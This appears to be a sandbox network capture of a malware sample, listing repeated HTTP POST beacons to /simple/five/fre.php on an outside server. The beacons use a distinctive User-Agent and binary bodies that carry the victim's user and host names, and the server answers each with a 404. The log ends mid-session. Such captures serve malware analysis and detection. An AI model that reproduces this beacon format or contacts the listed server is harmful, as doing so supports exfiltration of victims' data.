Oct 25, 2024 10:20:02.396137953 CEST	228	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:03.042490005 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 176 Connection: close
Oct 25, 2024 10:20:03.047947884 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones965543JONES-PC+0FDD42EE188E931437F4FBE2C25tbq
Oct 25, 2024 10:20:04.019900084 CEST	228	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:04.087390900 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:04.092936039 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:05.060925961 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:05.225447893 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:05.231107950 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:06.203742981 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:06.367363930 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:06.375575066 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:07.328375101 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:07.479399920 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:07.485394001 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:09.431647062 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Oct 25, 2024 10:20:09.432967901 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Oct 25, 2024 10:20:09.433762074 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:09.590027094 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:09.597187996 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:10.553689957 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:10.709742069 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:10.715159893 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:11.671643019 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49738	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:12.304312944 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:12.310127020 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:13.293423891 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49739	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:13.446667910 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:13.452611923 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:14.398870945 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49740	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:14.587332964 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:14.593029022 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:15.567843914 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49741	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:15.746071100 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:15.751616955 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:16.716876984 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49744	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:16.867280006 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:16.872788906 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:17.832015991 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49747	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:18.199476957 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:18.205156088 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:19.151099920 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49749	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:19.303529024 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:19.310463905 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:21.110606909 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Oct 25, 2024 10:20:21.113428116 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Oct 25, 2024 10:20:21.363428116 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49751	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:21.374851942 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:21.380407095 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:22.348746061 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:22.543530941 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:22.549457073 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:23.506381989 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:23.678324938 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:23.684072971 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:24.651226044 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49754	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:24.811218977 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:24.816659927 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:25.785826921 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49755	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
